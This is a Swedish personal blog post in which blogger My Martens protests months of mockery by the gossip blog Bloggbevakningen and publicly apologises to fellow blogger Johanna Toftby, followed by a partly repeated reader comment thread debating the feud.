Johanna Toftby – Förlåt / Cam Cam – Bloggbevakningen – Lägg ner

Hej fina du! <3 Här kommer ett långt, känsloladdat inlägg. Det är dessutom ganska rörigt med många länkar till Bloggbevakningen som trakasserat mig under flera månaders tid.

Nu har jag fått nog. Nu blir jag i hjärtat ledsen…  Vissa av er känner till att en kvinna som kallas Cam Cam, återupprepat skriver om mig genom sin blogg BLOGGBEVAKNINGEN. Som ligger under Pelles portal NÖJESGUIDEN.  Jag gör nu någonting jag aldrig trodde att jag skulle göra. Jag släpper igenom hennes fruktansvärda inlägg OM MIG. 

Jag svarade precis på hennes kommentar INNE på mitt kommentarsfält här är mitt svar. Det grå markerade lååååånga är både mitt svar och min vädjan! 

Hej Cam Cam. Jag vet egentligen inte vem du är. Jag vet inte heller hur du mår. Men jag kan göra ett konstaterande att du har en ordentlig hang-up på mig. Jag uppfattar det att du på nästan ett obehagligt sätt stalkar mig! Det är min känsla och uppfattning av ditt återupprepade sätt att helt skoningslöst häng ut mig på ett osmakligt sätt.
Att ifrågasätta mig, håna mig, och driva på en hets som leder till ren och skär mobbning är under all kritik. Jag kände inte till dig innan du började dyka upp i MITT kommentarsfält, med DINA inlägg om MIG.
Då du inte bara hänger ut mig, utan även andra vänner och bloggkollegor så undrar jag hur du mår? 

Du skrev nyligen elakt om Elaine Eksvärd. Jag läste hur det faktisk påverkar fler än mig med dina inlägg och kränkningar. Vi är många som blir sårade och tar illa vid oss. Nu ska jag låta Elaine tala för sig själv, men denna super woman och jag är tydligen rörande överens om att det du gör är långt ifrån okay!

 Du skriva dessvärre om många andra också, som även dom reagerat Annika Englund, Alexandra "Kissie" Nilsson, Isabella "Blondinbella", Daniel Paris m.f WHY?
Det är en sak att "rapportera" om andra kändisar och bloggare. DET kan vara roliga inlägg, där du lyfter fram positiva saker, om du nu vill rapportera gällande andra bloggare. Tex, om/när någon väntar/får barn. När någon gifter/förlovar sig. När någon släpper en bok. Ett roligt citat, en snygg outfit. Ja inte vet jag. Det är bara fantasin som sätter gränserna. MEN, om du istället skulle skriva positiva saker om alla du skriver om och sprida pepp, motivation och nätkärlek så skulle ju VI. Jag med andra bloggare både nämnda och onämnda ge dig cred, länkningar och uppskatta det du gör.

Läsarna skulle förmodligen också uppskatta det du gör. Du som ändå besitter makten med en relativt tung trafik borde väl använda den till något bra istället för att hetsa människor till att hata, dela och rapportera. Det är ju för sjutton maktmissbruk enligt mig.
Du sprider ut lögner. Insinuerar och går in för att jävlas och förstöra. VARFÖR? Hur kan man medvetet vara så utstuderat elak? Varför?
När du skrev ditt inlägg "Ljuger My om sitt nya jobb som PT" var en fråga enligt dig. Den fakta du baserade det på stämde inte. Utbildningen har förändrats sedan DU gick utbildningen på SAFE Education. Jag är utbildad PT och inte "bara" instruktör. Konsekvenserna av detta blev följande:
Det var min första dag på jobbet. Jag var förväntansfull, glad och samtidigt lite nervös. Jag presenterade mig för mina kollegor och gjorde ett första intryck. Första intrycket blev för hälften av mina kollegor, att repan OCH SATS huvudkotor blivit nedringda pga av DITT inlägg. Jag hade inte ens hunnit presentera mig för människorna som fick ta emot dessa samtal. SATS VD blev inkopplad, man spårade samtal och försökte styra upp det drev mot mig som DU skapade med DITT inlägg. 

Det drog med sig stora konsekvenser för både mig och SATS ledning. Min anställning hängde löst, (trodde jag) Tills SATS valde att backa mig i frågan och hitåt ett sätt att hantera denna fruktansvärda situation. Jag mådde skit! Jag gick in och grät inne på toan i personalrummet. Jag kände mig som i en riktig "mean girls film" Jag skämdes inför mina kollegor. Som dessutom inte förstår sig på bloggbranchen. Nu fick dom lära känna både den och dess baksida.
Du är bloggare, jag är bloggare. Båda är vi människor, med både fel och brister.
Hur FAN kan man tillåta den mobb, och det drev som sker i ditt kommentarsfält, baserat på DINA inlägg. Mot mig och mÅNGA andra?!
Att läsa alla hårda, elaka och kränkande ord om mig, på din sida. Det är ju inte normalt. DU är ansvarig över din sida. Ingen annan. Hat föder hat. Vi är trots allt även förebilder för många av våra läsare. Precis som barnen.... Dom gör inte som vi säger, dom gör som vi gör! Kanske någonting som du borde ha i åtanke.
Även om du flera gånger, med en hårfin gräns klarar dig undan ifrån just förtal. Så är det ju bara näthat och kaos du skapar. Förstår du inte gatt alla vi som byggt upp våra bloggar på egen hand. VI som inte skor oss på andras bekostnad har fått nog.
Jag ska bara tala för mig själv i detta fallet. JAG har fått nog. Hat föder hat, som vi gör gör många andra. Det är inte bara vuxna kloka människor som läser våra bloggar det är ven minderåriga och ungdomar.
TACK och lov är min egen son bara 6 år gammal. Så han slipper iallfall att läsa allt elakt som DU skriver om mig, och framförallt allt elakt som DU låter dina läsare skriva om i ditt kommentarsfält. Du har hängt ut mig, mitt x (Ludvigs pappa) och HANS söner sedan tidigare på bloggen. En bild som dessutom var skyddad av upphovsrätten. Då fick jag BE dig som mamma och före detta styvmamma att tag bort dessa oskyldiga barn från din sajt. Du hånar min dyslexi, mitt sätt att skriva. Min rubriksättning. Du lägger dig i mina samarbeten, även här såg du till att jag blev "anonymt" anmäld till RO. Där man använde dig som referens och källa. Du plockar mina citat och ord ur sitt sammanhang och bygger ihop en egen sanning av det. 

Du hänger ut mig och hånar mig angående mitt sjukhusbesök och min förstoppning som följde av operationen. På ett väldigt osmakligt sätt så hånar du detta. Du tar upp det när jag sitter på Cancerfondens årliga gala. Jag jobbar mot cancer. Du har INGEN ANING om hur cancer har och fortfarande påverkar mitt liv. Det är OSMAKLIGT att hänga ut mig som du gör.
Du ifrågasätter "Är My verkligen såhär dum i huvudet på riktigt". Vet du Cam Cam, jag är inte perfekt. Jag stavar som en kratta, jag råkade ut för både blindarmen och för njursten. Jag opererades och blev förstoppad. SHIT HAPPENS! MEN jag är aldrig medvetet elak och utstuderat går in för att förstöra andra människor liv. Jag personligen håller på att bygga upp mitt eget liv efter att total-kraschat både fysiskt och psykiskt efter min konkurs, och två dödsfall. RESPEKT Cam Cam! Vem vill du vara? Vill du vara omnämnd som bloggaren som sprider näthat som ingen tycker om. Bloggaren som trycker ner, förtalar och kränker andra människor, för att få mer statistik. Det är FAN inte okay! Jag ber dig som Mamma, som människa, som bloggare, som kvinna. BYT TAKTIK! Du sårar ju för fasiken människor på löpande band..... Gör din grej fast, HELT tvärt om. SNÄLLA rara du, lämna mig ifred nu! / My Martens

https://blogg.ng.se/bloggbevakning/2016/10/ar-martens-sa-har-dum-pa-riktigt

FullSizeRender

https://blogg.ng.se/bloggbevakning/2016/10/ljuger-martens-om-sitt-nya-jobb-som-pt

 

FullSizeRender

https://blogg.ng.se/bloggbevakning/2016/10/antligen-6

14795806_1232162386822253_961176345_o

https://blogg.ng.se/bloggbevakning/2016/10/hej-vad-det-svanger

FullSizeRender

 

https://blogg.ng.se/bloggbevakning/2016/12/hon-kanske-inte-menar-bloggen

Det senast i Cam Cams hetsjakt mot mig, är att hon nu i dagarna aktualiserar en gammal fejd där jag både sårat och sårats. Som jag dessutom är allt annat än stolt över.

https://blogg.ng.se/bloggbevakning/category/bloggare/my-martens

FullSizeRender

”Ärkefienderna Myggan Martens och Johanna Toftby”

WHAT?! Ja, vet du vad. Att vi båda har liknande profilbilder är då sannerligen en slump. Ingen av oss kopierar varandra. JA, jag och Johanna hade ett offentligt gräl 2015.

Johanna skrev ett ( om du frågar mig ogenomtänkt blogginlägg) Där hon påpekade att folk stal hennes bilder, bilder som hon blivit anlitat av Love Forever att modella för. Sanningen var den att fotografen ägde bilderna och Terece bakom Love Forever köpt loss rättigheterna. Vilket vi alla som modellade för Terece visste om. 

Men nu orkar jag inte dra upp en gammal story.

Poängen vara att precis dagen INNAN Johanna inlägg så hade jag en tävling i samarbete med Love Forever där Johanna T, var med på flera bilder. (Jag omnämnde henne som, snygga Johanna och länkade till hennes blogg)

Problemet vara att  MÅNGA av Johannas alla läsare skrev att jag stulit hennes bilder, att jag var en ful copycat osv. Lång historia kort. Det blev en MASSA DRAMA.

Jag var helt ny och oerfaren i bloggbranchen. En riktig gröngöling helt enkelt . jag var verkligen helt oförberedd på detta, samtidigt som både min blig instegar och mail smattrade ev elaka påhopp från hennes läsare gällande detta.

Jag försökte att ta kontrollen genom ett ganska tafatt försök till en förklaring att hon förmodligen inte menade mig.

Men återigen HAT föder HAT, det startades en mobb mot mig även denna gång.

Strax efter pratades vi vid på telefonen. Jag BAD henne verkligen om att vi istället skulle enas om ena  gemensamt svar och lägga ”locket på”.

 Att hon skulle förklara på sin blogg att det inte var hennes mening att skapa detta hatet mot mig. Och jag i min tur skulle förklara på min blogg att jag förmodligen hade missförstått henne på Love Forevers modevisning och vid middagen ect.  

Men nej, hon valde att säga att hon skulle rådgöra med sin särbo Janne först och sedan och återkoppla till mig.

Vi la på, och hon svarade inte när jag ringde upp igen. Eller smsade. 

VAD blev konsekvenserna av detta. Jo, återigen HAT föder HAT.  Jag är inte stolt över detta inlägg, jag tycker med facit i hand att det var dumt och omoget gjort av mig. Jag borde varit större än så. Jag borde ”stått” över. Det hade nämligen besparat mig ÅR av drama och hat ifrån henne och framförallt hennes läsare.

Vad har jag lärt mig genom dessa år som professionell bloggare. Att HAT föder HAT. Det är en fruktansvärd dagisnivå. 

Det borde vara tvärt om, starka kvinnor  borde stöttar och lyfter varandra. Tänk vad långt vi hade kunnat gå om vi istället hjälptes åt.

 Men det är också ENDA gången jag skrivit om någon, enda gången jag gjort så. Jag stod för det, skrev under med MITT namn.

För det kära läsare ska du veta att i denna smutsiga bloggbranch så är det tyvärr många som inte står för sina kommentarer och inlägg, utan istället döljer det bakom VPN tunnlar och anonyma konton. Jag stod för det och hamnade på Johannas ”Shit-list ”.  Åren har gått och jag lägger ingen energi på det längre. Men nu drog Cam Cam igång cirkusen igen. 

Ärligt talat så känner jag inte Johanna privat. Jag har ingenting med henne att göra, och har absolut inagn aning om vad hon gör och inte gör. Hon är en snygg 40+ som precis som jag brinner för mode, träning och hälsa. Vi bloggar.  Vi båda är tidigare från TV3s Ensam Mamma Söker. DET är vad vi har gemensamt. Jag önskar henne inget ont. Jag tycker varken om eller inte om henne. Jag tycker ingenting. 

Så nu när Cam Cam ska passa på att dra upp detta igen, så har det kommit en himmelens massa elaka kommentarer om både henne och mig. Inne på Cam Cams sida, på flaskback, på min blogg  (dom har jag inte släppt igenom)  Cirkusen och dramat är igång IGEN! SUCK!!!! 

Återigen HAT föder HAT! Jag skulle aldrig hantera en liknande situation på samma sätt idag. NOG MED DRAMA! En konkurs, några dödsfall, lite distans till det hela och allting känns bara galet fånigt. Tyvärr har det fått STORA konsekvenser av fortsatt hat mot mig. Men känslomässigt stängde jag av där någonstans vid slutet av 2015. 

När vi ändå har det på tal, så tänker jag passa på att offentligt be Johanna om ursäkt för mitt omogna beteende.

Johanna Toftby, Förlåt att jag sårade dig med mitt inlägg. Jag handlade i affekt och visste inte bättre. Jag står för mina känslor och mina ord. Men det var dumt av mig. Borde stått över och handlat annorlunda. Förlåt.  / My

FullSizeRender

 

https://blogg.ng.se/bloggbevakning/2017/01/phew

Nästa inlägg jag visar er här. Då skriver Cam Cam om mig och min fina vän Bobby. Hon tillåter en hob av människor att förnedra honom, skriva fruktansvärt elaka saker om Bobby, i sitt kommentarsfält. Återigen, hennes blogginlägg driver på ett fruktansvärt hat. INTE okay. Jag blir så ledsen då detta är en nära vän till mig som får skit från hennes läsare (och indirekt henne) pga av hennes ännu en gång ogenomtänkta inlägg om mig.

Dessutom så är det för bövelen Cancerfondens årliga Tillsammans mot cancer gala. Hur FAN kan man  göra så. Alla vi som är där har på något sätt en koppling till cancer. Vi alla engagerar oss och försöker att kämpa i kampen mot Cancer! Då väljer Cam Cam att hänga ut även det- UTAN att veta min koppling till både Cancer och Cancerfonden. SMAKLÖST!!!!

Vad vill jag ha ut av detta inlägg. Jo, att HAT föder HAT. Det är så onödigt, dumt och sorgligt…. Jag HOPPAS och som jag skriva till Cam Cam ovan i svaret till henne, Att snälla Cam Cam, tänk om! Använd din vilda fantasi, och din trafik och makt till något positivt istället. Var en förebild istället för tvärt om. För min skull, för våra läsares skull men framförallt för din egen skull!  

Till dig som läsare, stötta detta genom att INTE sprida mer näthat och drama. SNÄLLA du som läser detta. Jag vill inte ha några elaka kommentarer kring andra bloggare. Vi ska istället gemensamt engagera oss i att sprida NÄTKÄRLEK, stötta och lyfta fram varandra. Men även Förlåta, släppa taget och gå vidare.

Jag förlåter dig Cam Cam.. Släpp taget om mig nu.

/My Martens 

PS: Ber redan om ursäkt i föreväg för alla mina stavfel. Jag har Dyslexi och skäms inte för det.. 

224 Komentarer

 1. Usch vilken vidrig person. Gick in där en gång o läste, men blev bara förbannad vilket otroligt skit där skrivs, både utav bloggaren själv . Konstigt att inte hon blir anmäld ! Har läst på några andra bloggar som oxå reagerar. Men ärligt talat har hon inget annat att fylla sin blogg med mer än att gå in o leta fel hos andra.

 2. Hej!
  Fy farao vilken iskall och hemsk människa!
  Du, det gällande Toftby,jag har följt din blogg länge som skam.. Jag minns att du skrev att hon bl.a. varit nonchalant mot dig på Formex och ignorerat dig,fällt kommentarer om dina extensions,stämmer inte det? Jag blir förvirrad när du nu skriver att ni knappt pratat? Du återgav flera situationer när hon frusit ut dig? Bjöd med alla utom dig till nån bar,men sen när hon fick veta att du kände Graaf passade det? Så nu ber du alltså om ursäkt? Hon då?
  Kraaaam

  • Ja, det var så det gick till. jag skrev om det, jag länkar till det även ifrån detta inlägget. MEN; det var fel väg att gå. Jag borde inte ha skrivit det inlägget. DET är vad jag ber om ursäkt för. Jag kan inte påverka andra. men jag kan påverka mig själv….. Kram Ps: jag ÄLSKAR SKAM <3

 3. Hoppas att hon lyssnar och låter dig vara ifred. Hon är så elak så jag vet inte hur det kan sluta. Du har mitt fulla stöd mamma My. Nu måste du få vara ifred. Kram ❤

 4. Stark gjort, My.
  Du vet ju att du bara kommer få mer hån och förlöjligande från CamCam men MIN RESPEKT har du.
  Jag har verkligen gillat CamCam från början men vi är många som är så jävla less på det här nu.

 5. Du har absolut hela min respekt också. Väldigt sjuk person som håller på med kränkningar av andra. Tyder bara på dålig självkänsla o underlägsenhet. Fortsätt att blogga på ditt sätt.

 6. Kära my. Bra skrivet till bloggbevakning som du förstår så finns det människor utan empati o som ej kan ta tills sej andras känslor och ha förståelse för det. Det är skrämmande o fel. Många som hackas på där särskilt anna Book. Som kallas stollen hemskt. Det är meningen att det ska vara roligt men är bara dålig humor. Värst är en del som kommenterar. Nämner att bloggare är paranoida ja det är inte klokt. Så ett jävla drev finns där. Men fler har hjärta o börjat protestera. Snälla försök förstå en sådan människa njuter nog av att du vädjar till henne o ber henne sluta o gillar makt och mobbning. Jag Tycker det gått för långt men hon kör sitt race. hoppas nu när du sagt ditt spill ingen tid för döva öron och stängda hjärtan. Skit i det man kan vända sej till sådana som jobbar med kränkningar på nätet o få stöd o råd. Jag lider med dej. Men tänker på dej och att du ska få må bra. Ta hand om dej kram o tack för fin blogg.

  • Hej! Det är så sorgligt när man går så hårt åt andra männsikor. Speciellt i offentlighetens ljus. Ja, Stackars Anna har fått ta en hel del skit =( Tack snälla du! Kram

 7. Bra My!! Grymt att erkänna och svälja sin stolthet! Tror faktiskt att Johanna också lagt det bakom sig, jag hoppas det i alla fall. Hade varit bra om hon kunnat säga detsamma, så ni verkligen grävt ner stridsyxan. Nu har du visat henne i alla fall, så nu har hon bollen…. Hon jobbar ju också hårt för nolltolerans inom nätmobbing, så nu är det upp till bevis.
  Keep up your good work girl!!

 8. Så sjukt så nan tror man svimmar! Det var länge sen jag slutade läsa Johannas blogg..men jag följer maggan och hoppas verkligen inte hon behandlar dig så illa! Jag hatar mobbning! Kram! Stå på dig, ärlighet vinner!

 9. Hej My,
  OM du hade ångrat ditt inlägg om Johanna med alla dess vidriga kommentarer så hade du raderat det och inte länkat till det.
  DET får mig att ifrågasätta ditt förlåtande och får mig att tro att du är åter ute efter den trafik som den här typen av rubrik ger och som du tidigare har använt dig av.
  Hur många gånger ska Johanna ha sitt namn i dina rubriker? Vem mobbar vem?
  Ta bort inlägget om du inte är stolt över det istället för att ta upp det gång efter gång och tom. länka till det.
  Ett tips från någon som tycker att du inte agerar i välmening.

  • Hej Anna, jag ber Johanna om ursäkt för mitt handlande i affekt. Just för att jag SKREV det inlägget. Just för att Cam Cam drog igång cirkusen igen. Det skrivs MINST lika mycket om mig både, då, efter och nu på Johannas blogg. OM du väljer att lägga in din egen tolkning av det så är det upp till dig. Jag kan bara rekommendera dig att läsa mitt inlägg igen.. Så kanske du förstår hur jag menar och faktiskt kan stå för det jag har gjort. Förlåta det jag har blivit utsatt för och också säga förlåt. Och mena det genuint…. Kram

   • OM du genuint hade bett offentligt om ursäkt så hade du skrivit att du hade tagit bort inlägget och inte genom att hänvisa till det och alla de elaka kommentarerna (apropå hat föder hat).
    Att du sedan släpper fram även i detta inlägg elaka och kränkande kommentarer om Johanna med namn visar bara att din ursäkt är långt ifrån ärlig så vissa av oss läsare ser dubbelmoralen i dina ord oavsett vad du påstår.
    Tycker verkligen att du ska fundera kring din roll som nätmobbare lite mer än du gör och inte skylla alltid på dom andra.
    Ett tips från någon som har tröttnat på allt det här och hur bloggare gör allt för att få nya läsare.

    • Jag svarade på hennes inlägg. Jag BAD igår om URSÄKT för det. jag borde ha stått över och ådrig gjort det. jag svarade i självförsvar och affekt, efter hennes inlägg. DET var fel. Det står jag för. Att ta bort inlägg som legat uppe i flera år känns bara konstigt. Det är lite ”lagt kort ligger”
     Som jag skriver ovan, jag står för det jag både säger och gör. Jag har fått både hat och skit ifrån henne och hennes läsare genom åren. Det hade nog svårt för oss båda att hitta, radera och ta bort allt. Det kommer alltid finnas kvar in olika forum. DET är inte poängen.
     Jag bad om ursäkt, jag har förklarat varför. Detta pga av att Cam Cam drog igång cirkusen IGEN. Thats It. Detta blir bara en återupprepning av mitt inlägg… Du får tolka det precis om du vill. Är det någonting du un drar över så är du varmt välkommen att fråga. Med vänlig hälsning, My

 10. Usch vilken vidrig person. Gick in där en gång o läste, men blev bara förbannad vilket otroligt skit där skrivs, både utav bloggaren själv . Konstigt att inte hon blir anmäld ! Har läst på några andra bloggar som oxå reagerar. Men ärligt talat har hon inget annat att fylla sin blogg med mer än att gå in o leta fel hos andra.

 11. Hej!
  Fy farao vilken iskall och hemsk människa!
  Du, det gällande Toftby,jag har följt din blogg länge som skam.. Jag minns att du skrev att hon bl.a. varit nonchalant mot dig på Formex och ignorerat dig,fällt kommentarer om dina extensions,stämmer inte det? Jag blir förvirrad när du nu skriver att ni knappt pratat? Du återgav flera situationer när hon frusit ut dig? Bjöd med alla utom dig till nån bar,men sen när hon fick veta att du kände Graaf passade det? Så nu ber du alltså om ursäkt? Hon då?
  Kraaaam

  • Ja, det var så det gick till. jag skrev om det, jag länkar till det även ifrån detta inlägget. MEN; det var fel väg att gå. Jag borde inte ha skrivit det inlägget. DET är vad jag ber om ursäkt för. Jag kan inte påverka andra. men jag kan påverka mig själv….. Kram Ps: jag ÄLSKAR SKAM <3

 12. Hoppas att hon lyssnar och låter dig vara ifred. Hon är så elak så jag vet inte hur det kan sluta. Du har mitt fulla stöd mamma My. Nu måste du få vara ifred. Kram ❤

 13. Hej My! Du är en fantastisk fin inspiration! Både som PT, mamma och bloggare! Att det finns sådana människor som ovan är vidrigt. Hur kan man få lov att hålla på så?? Polisanmälan hjälper inte det? Jag hejjar på dig!

  • Jo det tycker jag. Varför ska du ta emot skit av en främmande människa?? Nätmobbning är ett brott. Finns ju unga som tar livet av sej. Tv tagit upp massa att man ska gå vidare med det. Hon kommer inte sluta hon blir ju rik på andras olycka. O dom som kommer o bli drabbade och är nu kränkta. Sånt samhälle kan vi inte ha att man säger vad som helst nästan. O människor blir dåliga av det. Jag tycker inte man ska blunda för det.

 14. Stark gjort, My.
  Du vet ju att du bara kommer få mer hån och förlöjligande från CamCam men MIN RESPEKT har du.
  Jag har verkligen gillat CamCam från början men vi är många som är så jävla less på det här nu.

 15. Hej My vad jag önskar av hela mitt hjärta att det blir slut på alla skriverier o mobbning om dig, du måste ju för sjutton få lugn o ro nångång. Kram på dig

 16. Du har absolut hela min respekt också. Väldigt sjuk person som håller på med kränkningar av andra. Tyder bara på dålig självkänsla o underlägsenhet. Fortsätt att blogga på ditt sätt.

 17. Kära my. Bra skrivet till bloggbevakning som du förstår så finns det människor utan empati o som ej kan ta tills sej andras känslor och ha förståelse för det. Det är skrämmande o fel. Många som hackas på där särskilt anna Book. Som kallas stollen hemskt. Det är meningen att det ska vara roligt men är bara dålig humor. Värst är en del som kommenterar. Nämner att bloggare är paranoida ja det är inte klokt. Så ett jävla drev finns där. Men fler har hjärta o börjat protestera. Snälla försök förstå en sådan människa njuter nog av att du vädjar till henne o ber henne sluta o gillar makt och mobbning. Jag Tycker det gått för långt men hon kör sitt race. hoppas nu när du sagt ditt spill ingen tid för döva öron och stängda hjärtan. Skit i det man kan vända sej till sådana som jobbar med kränkningar på nätet o få stöd o råd. Jag lider med dej. Men tänker på dej och att du ska få må bra. Ta hand om dej kram o tack för fin blogg.

  • Hej! Det är så sorgligt när man går så hårt åt andra männsikor. Speciellt i offentlighetens ljus. Ja, Stackars Anna har fått ta en hel del skit =( Tack snälla du! Kram

 18. Bra My!! Grymt att erkänna och svälja sin stolthet! Tror faktiskt att Johanna också lagt det bakom sig, jag hoppas det i alla fall. Hade varit bra om hon kunnat säga detsamma, så ni verkligen grävt ner stridsyxan. Nu har du visat henne i alla fall, så nu har hon bollen…. Hon jobbar ju också hårt för nolltolerans inom nätmobbing, så nu är det upp till bevis.

  Keep up your good work girl!!

 19. Så sjukt så nan tror man svimmar! Det var länge sen jag slutade läsa Johannas blogg..men jag följer maggan och hoppas verkligen inte hon behandlar dig så illa! Jag hatar mobbning! Kram! Stå på dig, ärlighet vinner!

 20. Hej My,
  OM du hade ångrat ditt inlägg om Johanna med alla dess vidriga kommentarer så hade du raderat det och inte länkat till det.
  DET får mig att ifrågasätta ditt förlåtande och får mig att tro att du är åter ute efter den trafik som den här typen av rubrik ger och som du tidigare har använt dig av.
  Hur många gånger ska Johanna ha sitt namn i dina rubriker? Vem mobbar vem?
  Ta bort inlägget om du inte är stolt över det istället för att ta upp det gång efter gång och tom. länka till det.
  Ett tips från någon som tycker att du inte agerar i välmening.

  • Hej Anna, jag ber Johanna om ursäkt för mitt handlande i affekt. Just för att jag SKREV det inlägget. Just för att Cam Cam drog igång cirkusen igen. Det skrivs MINST lika mycket om mig både, då, efter och nu på Johannas blogg. OM du väljer att lägga in din egen tolkning av det så är det upp till dig. Jag kan bara rekommendera dig att läsa mitt inlägg igen.. Så kanske du förstår hur jag menar och faktiskt kan stå för det jag har gjort. Förlåta det jag har blivit utsatt för och också säga förlåt. Och mena det genuint…. Kram

   • OM du genuint hade bett offentligt om ursäkt så hade du skrivit att du hade tagit bort inlägget och inte genom att hänvisa till det och alla de elaka kommentarerna (apropå hat föder hat).

    Att du sedan släpper fram även i detta inlägg elaka och kränkande kommentarer om Johanna med namn visar bara att din ursäkt är långt ifrån ärlig så vissa av oss läsare ser dubbelmoralen i dina ord oavsett vad du påstår.

    Tycker verkligen att du ska fundera kring din roll som nätmobbare lite mer än du gör och inte skylla alltid på dom andra.

    Ett tips från någon som har tröttnat på allt det här och hur bloggare gör allt för att få nya läsare.

    • Jag svarade på hennes inlägg. Jag BAD igår om URSÄKT för det. jag borde ha stått över och ådrig gjort det. jag svarade i självförsvar och affekt, efter hennes inlägg. DET var fel. Det står jag för. Att ta bort inlägg som legat uppe i flera år känns bara konstigt. Det är lite ”lagt kort ligger”

     Som jag skriver ovan, jag står för det jag både säger och gör. Jag har fått både hat och skit ifrån henne och hennes läsare genom åren. Det hade nog svårt för oss båda att hitta, radera och ta bort allt. Det kommer alltid finnas kvar in olika forum. DET är inte poängen.

     Jag bad om ursäkt, jag har förklarat varför. Detta pga av att Cam Cam drog igång cirkusen IGEN. Thats It. Detta blir bara en återupprepning av mitt inlägg… Du får tolka det precis om du vill. Är det någonting du un drar över så är du varmt välkommen att fråga. Med vänlig hälsning, My

 21. Hej My! Du är en fantastisk fin inspiration! Både som PT, mamma och bloggare! Att det finns sådana människor som ovan är vidrigt. Hur kan man få lov att hålla på så?? Polisanmälan hjälper inte det? Jag hejjar på dig!

  • Jo det tycker jag. Varför ska du ta emot skit av en främmande människa?? Nätmobbning är ett brott. Finns ju unga som tar livet av sej. Tv tagit upp massa att man ska gå vidare med det. Hon kommer inte sluta hon blir ju rik på andras olycka. O dom som kommer o bli drabbade och är nu kränkta. Sånt samhälle kan vi inte ha att man säger vad som helst nästan. O människor blir dåliga av det. Jag tycker inte man ska blunda för det.

 22. Hej My vad jag önskar av hela mitt hjärta att det blir slut på alla skriverier o mobbning om dig, du måste ju för sjutton få lugn o ro nångång. Kram på dig

 23. Hej My,
  Vi har ju skrivit negativt till dig ibland när jag tycker att du är knasig men oftast positivt – hoppas att du vet det. (Ja du verkar ”skilled” i att leta IP så gör det för all del).
  Jag tror inte att det här med Nöjesguidens bloggare kommer att hålla mycket länge till. Dom kan inte ha en sådan vinkling för sitt varumärke. Det den där Cam Cam utstrålar är fruktansvärt nedlåtande och som du själv tycker ”mobbande” i ditt fall. I längden håller inte det. Kul en stund som för hyenorna som fångade den flådda apan men med bitter eftersmak.
  Jag tror inte att du ska oroa dig så mycket – hon kommer att vara borta därifrån ganska snart. Så klart kliar det att hon har så många besökare men man kan ju fråga sig vilken grupp hon drar till sig? Köpstarka smarta kvinnor eller rena miffon? Vad vet jag.
  JT kan du strunta i – hon är snart passé – hyvla ansiktet funkar väl ett par år till men sedan är det slut med att åma sig framför kameran så hon får hitta på nåt nytt och där finns ju inget annat än yta så – lär bli svårt.
  Kram

   • Håller med! Har man modererade kommentarer, vilket My har, så väljer hon ju själv hur hennes kommentarsfält ska se ut. Att be om ursäkt till Johanna i rubriken och därefter släppa igenom hatkommentarer om henne är sån jäkla dubbelmoral av My.

    • Hat kommentarer om Johanna? VART? Vad pratar du om? Folk inklusive jag själv och MÅNGA andra bloggare har tröttnat på att bli sparkade och påhoppade, AV Cam Cam. Så att man som läsare, bloggkollega, kvinna, mamma osv har en åsikt om Cam Cams beteende Det är inte konstigt….. Det är för för sjutton en moderna variant på häxjakt hon utför på mig m.f. Men Hat kommentarer om Johanna?

     • Du har redan svarat och väljer i det svaret att ignorera att det står elaka saker om Johanna i kommentaren du släppt igenom! Det var väl inte så svårt att förstå…

     • My – ”Lena PH” skriver i sin kommentar:
      ”JT kan du strunta i – hon är snart passé – hyvla ansiktet funkar väl ett par år till men sedan är det slut med att åma sig framför kameran så hon får hitta på nåt nytt och där finns ju inget annat än yta så – lär bli svårt.”
      DET är hatkommentaren som dina andra läsare syftar på. Att du släppte igenom den. Och där måste jag också säga att ja, det är lite konstigt att släppa igenom en sådan kommentar om du inte vill ha hat osv i ditt kommentarfält. Du kanske borde ta bort den.

     • Aha! Oj! Den kommentaren har jag missat.. En kommentar. Men dom hundratals mot mig. Dom är okay ? tack för infon. Den ska jag ta bort. Jag tycker att Johanna är jätte fräsch för sin ålder?? Modogt att stå för att hon använder botox, fillers och hjälpmedel. DET ska man credda henne för! Att man brut sig om sitt utseende är jag inte emot, tvärt om! Ska ta bort den kommentaren för den har jag i ärlighetens namn inte sett! ? tack för info! ?

 24. Jeeesus säger jag bara, jag har förstått att det varit lite svajigt minst sagt mellan dig, Magdalena, Johanna Toftby och hon med många barn Madde. Men då jag läser detta så förstår jag ändå inte hur stort detta är men jag förstår att det är större ändå. Nu kommer mina funderingar lite huller om buller här… Vet DU vem denna cam cam är? är det EN person? Det verkar för mig som om denna Cam Cam lägger bränsle på er eld. Jag tycker det är stort och bra av dig att skriva detta och jag hoppas verkligen för er skull att detta kan leda till något bra. Det kan väl vi som skriver och följer My´s blogg i alla fall bli goda exempel på. Fasen, det pågår krig runt våran knut och då menar jag riktiga krig, vi har människor som vi måste ta hand om på bästa sätt och vet man inte hur man ska göra så börja i din närhet som jag brukat säga till mina barn. Det är bra nog, gör gott och stötta de som inte mår bra, svara fint på tilltal och tacka för det du får och/eller allt du har. Många utav dessa som bråkar här i bloggvärden stöder ju faktiskt och bygger hus mm. åt dem som blir utsatta för våld och svält, det är otroligt fint gjort. Och skulle hälften av den kraften läggas på att hålla frid och god ton i närheten så skulle denna Cam Cam bli arbetslös. Kram och krya på dig My och som sagt stort av dig att gå ut för den goda sidan <3

 25. Hej My,

  Vi har ju skrivit negativt till dig ibland när jag tycker att du är knasig men oftast positivt – hoppas att du vet det. (Ja du verkar ”skilled” i att leta IP så gör det för all del).

  Jag tror inte att det här med Nöjesguidens bloggare kommer att hålla mycket länge till. Dom kan inte ha en sådan vinkling för sitt varumärke. Det den där Cam Cam utstrålar är fruktansvärt nedlåtande och som du själv tycker ”mobbande” i ditt fall. I längden håller inte det. Kul en stund som för hyenorna som fångade den flådda apan men med bitter eftersmak.

  Jag tror inte att du ska oroa dig så mycket – hon kommer att vara borta därifrån ganska snart. Så klart kliar det att hon har så många besökare men man kan ju fråga sig vilken grupp hon drar till sig? Köpstarka smarta kvinnor eller rena miffon? Vad vet jag.

  JT kan du strunta i – hon är snart passé – hyvla ansiktet funkar väl ett par år till men sedan är det slut med att åma sig framför kameran så hon får hitta på nåt nytt och där finns ju inget annat än yta så – lär bli svårt.

  Kram

   • Håller med! Har man modererade kommentarer, vilket My har, så väljer hon ju själv hur hennes kommentarsfält ska se ut. Att be om ursäkt till Johanna i rubriken och därefter släppa igenom hatkommentarer om henne är sån jäkla dubbelmoral av My.

